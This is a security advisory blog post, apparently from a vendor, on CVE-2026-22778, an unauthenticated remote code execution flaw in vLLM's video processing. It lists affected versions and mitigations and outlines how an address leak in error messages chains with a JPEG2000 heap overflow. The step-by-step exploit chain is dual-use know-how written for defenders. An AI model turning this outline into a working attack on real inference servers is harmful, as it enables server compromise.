
A critical pre-authenticated remote code execution (RCE) vulnerability, tracked as CVE-2026-22778 (CVSS 9.8), has been discovered in vLLM, a widely used inference and serving engine for large language models.
Publicly exposed vLLM deployments running video models are vulnerable to full server compromise. An attacker can trigger the flaw by submitting a malicious video link to vLLM’s API, resulting in arbitrary command execution on the underlying system without authentication.
The vulnerability affects vLLM versions 0.8.3 through 0.14.0 and stems from a chained exploit that combines an information disclosure flaw in error handling with a heap buffer overflow in a bundled video decoding dependency. When exploited together, these weaknesses allow attackers to bypass memory protections and gain code execution within the vLLM process.
While the issue is limited to deployments that enable multimodal video processing, the default exposure model of vLLM makes this vulnerability particularly dangerous for internet-facing inference services.
Affected Versions
Immediate Actions
- Upgrade to vLLM v0.14.1 or later.
- Verify OpenCV is updated to a patched version.
- Reduce exposure of inference APIs by blocking multimodal requests containing a
video_urlparameter to the following endpoints:POST /v1/chat/completionsPOST /v1/invocations
If you Can’t Patch Immediately
- Disable video and multimodal endpoints.
- Restrict access to inference APIs to trusted internal users or services.
What is vLLM?
vLLM is an open-source, high-throughput inference engine designed to efficiently serve large language models across cloud and self-hosted environments. It is widely adopted for running LLMs at scale due to its performance and memory efficiency, particularly under concurrent workloads.
As vLLM adoption has expanded beyond text-only inference to support multimodal inputs such as images and video, it has become increasingly exposed through public-facing APIs. This expanded attack surface is central to CVE-2026-22778, which affects deployments that enable video processing.
By chaining an information disclosure flaw with a heap buffer overflow in a bundled video decoding dependency, an unauthenticated attacker can achieve arbitrary code execution on vulnerable vLLM systems.
Technical Details
CVE-2026-22778 is not a single bug, but a chained exploit that combines an information disclosure issue with a heap-based buffer overflow in vLLM’s video processing pipeline. The exploit unfolds across multiple layers of the inference stack as follows:
- API request handling: An attacker sends a request to vLLM’s Completions or Invocations API containing a
video_url, triggering the multimodal video processing path without requiring authentication. - Video ingestion via OpenCV: vLLM processes the supplied video using OpenCV’s
cv2.VideoCapture()interface, which delegates decoding to a bundled FFmpeg library. - JPEG2000 decoding in FFmpeg: FFmpeg invokes the JPEG2000 decoder
libopenjp2to parse video frames, trusting attacker-controlled metadata embedded in the file structure. - Heap buffer overflow through crafted
cdefbox: A malicious JPEG2000 file abuses the channel definitioncdefbox to remap image channels without validating buffer sizes, causing a heap-based buffer overflow during decoding. - Function pointer corruption: The overflow overwrites adjacent heap memory, including a function pointer used by the decoder or cleanup routines.
- Arbitrary code execution: When the corrupted function pointer is later dereferenced, execution flow is redirected, resulting in arbitrary code execution within the vLLM process.
When chained together, these flaws allow reliable, unauthenticated remote code execution on vLLM deployments that enable video processing.
Information Disclosure through Error Handling
When vLLM receives malformed image or video input, it relies on Python imaging libraries to parse the data. In vulnerable versions, error messages generated during this process are returned directly to the client.
These error messages can include raw object representations containing heap memory addresses, for example:
cannot identify image file <_io.BytesIO object at 0x7a95e299e750>This leaks precise memory addresses from the vLLM process. Address Space Layout Randomization (ASLR) is a key defense against memory corruption exploits. By leaking heap addresses, vLLM effectively hands attackers the information needed to bypass ASLR and precisely target memory locations during exploitation.
Heap Buffer Overflow in Video Decoding
The second flaw resides in vLLM’s video processing pipeline. When handling video inputs, vLLM uses OpenCV, which in turn relies on FFmpeg for decoding.
In affected versions, a vulnerability in FFmpeg’s JPEG2000 decoder allows a specially crafted video file to trigger a heap buffer overflow. The overflow occurs when pixel data is written beyond the bounds of an allocated buffer, overwriting adjacent memory structures.
In practice, this overflow can overwrite function pointers used during memory cleanup. Once control flow is redirected, the attacker can execute arbitrary commands within the vLLM process.
Chained Exploitation: From Input to Code Execution
An attacker can combine these two flaws into a reliable exploit chain:
- Send a malformed image or video to trigger an error response.
- Extract leaked heap addresses from the error message.
- Send a crafted JPEG2000 video payload.
- Use the known memory layout to overwrite function pointers.
- Achieve arbitrary code execution without authentication.
No credentials are required, and the attack can be carried out remotely against exposed vLLM endpoints.
Why this Matters for AI Security
CVE-2026-22778 highlights a growing reality: AI infrastructure inherits the full risk surface of traditional software stacks, including memory corruption, dependency vulnerabilities, and unsafe error handling.
As AI systems expand beyond text into images, video, and agent-driven workflows, these risks compound. Security controls must extend beyond model behavior to the infrastructure that serves them.
References
- GitHub Security Advisory. (2026, February 2). GHSA-4r2x-xpjr-7cvv: Remote code execution in vLLM via malicious video processing. GitHub. https://github.com/advisories/GHSA-4r2x-xpjr-7cvv
- National Vulnerability Database (NVD). (2026). CVE-2026-22778: Remote code execution in vLLM. National Institute of Standards and Technology. https://nvd.nist.gov/vuln/detail/CVE-2026-22778
- OX Security Research Team. (2026, February 2). CVE-2026-22778: vLLM RCE vulnerability analysis. OX Security Blog. https://www.ox.security/blog/cve-2026-22778-vllm-rce-vulnerability/
- Underhill, K. (2026, February 2). Critical vLLM flaw puts AI systems at risk of remote code execution. eSecurity Planet. https://www.esecurityplanet.com/artificial-intelligence/critical-vllm-flaw-puts-ai-systems-at-risk-of-remote-code-execution/
- Schwake, E. (2025, December 5). Critical vLLM flaw exposes the soft underbelly of AI infrastructure. Salt Security Blog. https://salt.security/blog/critical-vllm-flaw-exposes-the-soft-underbelly-of-ai-infrastructure
Related blogs

CVE-2026-21858: Ni8mare: Unauthenticated Remote Code Execution in n8n
An unauthenticated Remote Code Execution (RCE) flaw, tracked as CVE-2026-21858 (CVSS 10.0), has been discovered in n8n, the widely-adopted workflow automation platform. With over 100 million Docker pulls and an estimated 100,000 locally deployed instances, this vulnerability transforms n8n from a productivity tool into a severe single point of potential failure for organizations globally.
Guess Who's Back: Shai-Hulud 3.0 The Golden Path
Security analysts recently identified a new variant of the Shai-Hulud npm supply chain worm in the public registry, signaling continued evolution of this threat family. This variant, dubbed “The Golden Path” exhibits modifications from prior waves of the malware, suggesting ongoing evolution in the threat actor’s tradecraft.
Kai at Work: A Day in the Life of an AI AppSec Engineer
Kai, Kodem’s secure-by-design AI AppSec Engineer, is integrated directly into the platform to deliver contextualized and actionable answers precisely when AppSec teams need them. By converting your existing security data into conversational intelligence, Kai eliminates the need for hours of manual investigation and context-switching. You can now ask questions as you would to a senior, humble, and tireless engineer.
A Primer on Runtime Intelligence
See how Kodem's cutting-edge sensor technology revolutionizes application monitoring at the kernel level.
Platform Overview Video
Watch our short platform overview video to see how Kodem discovers real security risks in your code at runtime.
The State of the Application Security Workflow
This report aims to equip readers with actionable insights that can help future-proof their security programs. Kodem, the publisher of this report, purpose built a platform that bridges these gaps by unifying shift-left strategies with runtime monitoring and protection.
.png)
Get real-time insights across the full stack…code, containers, OS, and memory
Watch how Kodem’s runtime security platform detects and blocks attacks before they cause damage. No guesswork. Just precise, automated protection.

